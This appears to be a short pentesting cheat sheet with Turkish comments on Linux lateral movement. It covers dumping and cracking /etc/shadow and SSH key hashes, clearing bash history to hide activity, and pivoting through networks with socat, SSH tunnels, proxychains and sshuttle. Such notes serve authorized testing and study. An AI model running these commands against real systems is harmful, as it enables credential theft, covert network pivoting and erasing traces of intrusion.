Linux Lateral Movement

Hash Dumping

cat /etc/shadow > shadow.txt
john --format=sha512crypt shadow.txt --wordlist=/usr/share/wordlists/rockyou.txt
hashcat -a3 -m 1800 shadow.txt /usr/share/wordlists/rockyou.txt

ssh2john id_rsa > ssh.hash
sh -c 'cat /home/kali/passwordattacks/ssh.rule >> /etc/john/john.conf'

History Silme

history -c
cat /dev/null > ~/.bash_history

Port Forwarding

# 8080 portunu dinler ve bütün trafiği 80 portuna yönlendirir
socat TCP4-LISTEN:8080,fork TCP4:192.168.1.4:80

socat TCP4-LISTEN:8080,fork TCP4:172.16.5.19:8443

SSH Tunneling

# Local port forwarding (Karşıdaki bir portu kendimize alma)
ssh -L 1234:localhost:3306 root@192.168.1.3

# Dynamic Port Forwarding (Karşıdaki bütün portları kendimize alma)
ssh -D 9999 root@192.168.1.3
mousepad /etc/proxychains4.conf
socks5 192.168.1.3 9999
proxychains nmap -sT -Pn 172.168.1.3

# Remote Port Forward (Kendi Portumuzu karşıya yönlendirme)
ssh -R 10.0.0.3:8080:0.0.0.0:80 ubuntu@192.168.1.3 -vN

# Remote Dynamic Port Forward
ssh -N -R 9999 root@192.168.1.2
mousepad /etc/proxychains4.conf
socks5 127.0.0.1 9999
proxychains nmap -v -sT -Pn -n 172.168.1.3

# SShuttle
sshuttle -r root@192.168.1.3:22 10.0.0.0/24 172.16.0.0/24

Chisel

Ligolo

DNS Tunneling

ICMP Tunneling

Last updated